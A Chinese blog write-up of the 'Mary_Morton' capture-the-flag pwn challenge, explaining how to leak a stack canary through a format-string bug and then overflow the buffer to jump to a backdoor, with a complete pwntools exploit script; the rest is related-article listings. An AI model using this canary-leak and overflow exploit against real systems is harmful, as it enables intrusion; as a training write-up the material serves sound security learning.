mary_morton

最新推荐文章于 2022-12-19 22:12:33 发布
最新推荐文章于 2022-12-19 22:12:33 发布
阅读量1.1k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pppp974/article/details/96876250
版权

mary_morton

这道题开启了canary保护,大概说一下题目,就是让你选择漏洞一个格式化字符漏洞还有一个就是栈溢出,这道题思路就是通过格式化字符漏洞泄露出cannary的值,然后进行栈溢出,后门题目已经给了。
在这里插入图片描述
来算算偏移量吧,buf为rbp-90h,canary就是v2为rbp-8h,所以偏移量为88h,然后在算一算格式化字符与Buf的偏移量就可以算出要多少字节来进行泄露了。调了一下,输了个aaaaaaaaaaaa.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x,然后得到aaaaaaaaaaaa.74451f60.0000007f.c4a83081.00000000.00000000.61616161.61616161.30252e78,显然得到偏移为6个字节,然后就可以写代码了。

from pwn import *

p=remote('111.198.29.45',59592)
system=0x4008De
p.recvuntil('3. Exit the battle')
p.sendline('2')
p.sendline('%23$p')
canary=int (p.recvuntil('1.')[:-2],16)
print(canary)
p.recvuntil('3. Exit the battle')
p.sendline('1')
payload=0x88*'a'+p64(canary)+p64(0xdeadbeef)+p64(system)
p.sendline(payload)

p.interactive()
gone too soon
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
bailey_morton_cv:贝利·莫顿(Bailey Morton)的简历
04-01
bailey_morton_cv 贝利·莫顿(Bailey Morton)的简历
morton BLDC__and_PCB_Included.rar
08-01
标题"Morton BLDC__and_PCB_Included.rar"暗示了这个压缩包可能包含了关于Morton品牌无刷直流电动机(BLDC)以及与其相关的电路板(PCB)的设计、规格或使用信息。BLDC电机是一种现代电机技术,常用于需要高效率、...
莫顿码(Morton code)介绍
cheche012345的博客
11-08 1万+
莫顿编码介绍
C#实现GIS中莫顿码的计算
Error的博客
06-07 1402
计算步骤:1.将横坐标和纵坐标分别转化为二进制,需要注意的是转化后的二进制位数要相同(本文中以8为二进制码进行演示)2.交叉排序后组合成16位2进制码3.将16位二进制码重新转化为整形数字,此数字即为我们需要的莫顿码C#代码如下:...
攻防世界pwn--Mary_Morton
YANG12345_6的博客
11-16 2199
攻防世界pwn–Mary_Morton file 一下,查看文件属性 checksec一下,查看保护措施 开了canary,在调用函数的时候会在栈上设置一个标志,标志的位置: EIP EBP canary logol ··· 栈的其他内容 开了NX,栈不可执行。 运行一下 ida查看其反汇编代码 在ida里看到有system函数: 地址:0x4008DA gdb调试,查看格式化字符串参数的位置 第六个位置 查看有关栈溢出的函数: 可以利用的栈溢出的buf的位置:rbp
攻防世界pwn——Mary_Morton
qq_62076255的博客
12-19 173
做题记录
关于莫顿编码计算过程
weixin_44312010的博客
10-12 9722
关于摩顿编码的计算 莫顿码的基本原理 莫顿码是一种将多维空间中的点坐标用一个一维的数值来表示,通过利用莫顿编码的方式来讲空间中点所对应的空间关系用莫顿码值之间的相邻关系来近似表示。 莫顿编码的计算方式 1.通过依次对多维空间中的点进行“迭代交叉计算”; 2.通过利用查询表来计算对应的莫顿码; 在本篇博客中,我增添了对于二维几何和三维几何坐标所对应的莫顿码值的整个过程。 ...
morton.dms
08-06
64位下的格式化字符串的任意内存读取 格式化字符串 %n ,它的功能是将%n之前打印出来的字符个数,赋值给一个变量。
morton-java:莫顿PackUnpack库
05-12
Morton64 m = new Morton64 ( 2 , 32 ); // 2 dimenstions 32 bits eachlong code = m . pack( 13 , 42 ); // pack two valueslong [] values = m . unpack(code); // should get back 13 and 42
Comparing-Filters:对基于Bloom,Cuckoo,Morton和PD的过滤器进行基准测试
04-04
比较过滤器 当前基准测试: 布隆过滤器(BF) 布谷鸟过滤器(CF) SIMD阻止布隆过滤器(SIMD) 莫顿滤镜(MF) 袖珍词典过滤器(PD) 验证 文件test.hpp test.cpp包含对过滤器的验证测试。...
线性四叉树十进制Morton码计算示例
weixin_34279184的博客
01-18 8699
线性四叉树十进制Morton码计算,具体算法描述龚健雅《地理信息系统基础》P108
攻防世界pwn高手进阶(持续更新)
qq_42988973的博客
12-16 497
攻防世界pwn高手进阶wp
Morton
热门推荐
给永远比拿愉快
07-08 1万+
版权声明:本文为博主原创文章,转载请注明原文出处! 写作时间:2019-07-08 17:11:27 Morton码的计算 Morton码是对栅格格网进行编码的一种算法,在Google中搜索Morton,搜索结果第一位是Wikipedia的Z-order Curve,这是因为Morton码编码结果展现为一种Z形的填充曲线。下面简要说一下如何计算四进制和十进制的Morton码。 四进制Morto...
攻防世界 Pwn 进阶 第一页
yongbaoii的博客
10-19 2984
写在最前面 我在某天中午睡了一觉之后大彻大悟 我感觉pwn最重要的是能不能找得到漏洞点,学会怎么利用这个漏洞点以及明白他的原理倒是要往后放一放,所以要来一个漏洞总结,总结我现在见到过的所有漏洞、漏洞的原理以及它的表现形式,就在攻防世界第一页之后吧,以题的形式去进行一些总结。 00 要把它跟之前新手区的放在一起总结,先稍稍回顾一下新手区。 攻防世界 Pwn 新手 1、栈溢出,从简单到难,开始有后门函数,到需要自己写函数参数,到最后的ret2libc。 常见漏洞点有read()函数、gets()函数、strca
Mary_Morton [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列17
重新启程
12-24 1524
题目地址:Mary_Morton 已经是高手进阶区的第六题了,每个题目都有不少收获,持之以恒! 先看看题目内容 很好,这是一道非常简单的热身pwn,当然,我是不会相信的!哈哈 大家应该注意到了,难度系数第一次>1星了,步入2星的阶段,最高是10星!期待一下 惯例先来检查安全机制 root@mypwn:/ctf/work/python/mary_morton# checksec ...
攻防世界——进阶PWN:Mary_Morton
baidu_36110484的博客
06-14 397
0x01源码分析 今天做了一道PWN题,考察了格式化字符串漏洞和绕过canary的栈溢出。比较基础,但是还是有值得记录的地方。 checksec查看,64位程序,开启了canary和栈不可执行。拖进IDA里,看到源码逻辑还是比较简单的。存在一个格式化字符串漏洞还有一个栈溢出。还有一个后门函数0x4008DA。 0x02 格式化字符串漏洞 先用老脚本看一下格式化串的相对偏移。 #search_offset.py #encoding:utf-8 from pwn import * context.log_le
XCTF攻防世界高手mary_morton
weixin_45948183的博客
03-24 312
格式化字符串泄露canary,栈溢出 从函数执行就可以看出,一个格式化字符串啊漏洞,一个栈溢出漏洞 checksec了一下有canary的保护,开启了canary,就不能直接利用栈溢出覆盖返回地址,通过通过格式化字符串漏洞泄露canary的值,然后再进行栈溢出的覆盖 buf在rbp-90h,v2在rbp-8h,canary与我们输入参数的偏移为0x90 - 8 = 0x88所以,覆盖返回地址的话...
ASIS-CTF-Finals-2017 Mary_Morton
qq_41071646的博客
01-11 1282
讲道理 这个 其实 感觉有两个方法  两种方法 都要调用一下    第一个  printf函数      第一个是 我们第一个可以    用printf  然后hook掉got的printf  不知道好不好实现  自己搜索了 资料 也没有发现  第二个 就是观察栈了  。。。。。。。 这里有个保护   就是  readfsqword  在 ida 的f5看的不是很清楚 我们 看 汇编窗...
攻防世界Mary_Morton wp
苗_的博客
10-13 276
首先查看他的保护机制:(checksec) 有canary保护 然后我们拖进ida发现两处溢出点: 看一下流程图和汇编可以知道readsqword这个地方有canary保护,只有 rax 和fs:28h 两个值相等的时候 才能跳转到返回值,反之则调用stack_chk_fail 找到后门函数 思路:将两个漏洞结合利用,首先利用字符串漏洞,泄露出canary的值,然后在函数要返回的时候再填回去,之后利用栈溢出,让其返回到后门函数 根据程序可以看出,v2应该就是canary的..
求矩阵四叉树的四进制和十进制Morton
最新发布
06-09
- 将Morton码的二进制表示转化为四进制数,得到节点的四进制Morton码,例如节点(3,2)的四进制Morton码为(32)。 2. 十进制Morton码 十进制Morton码将矩阵四叉树节点的坐标编码成十进制数,其中每一位表示节点在四叉...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值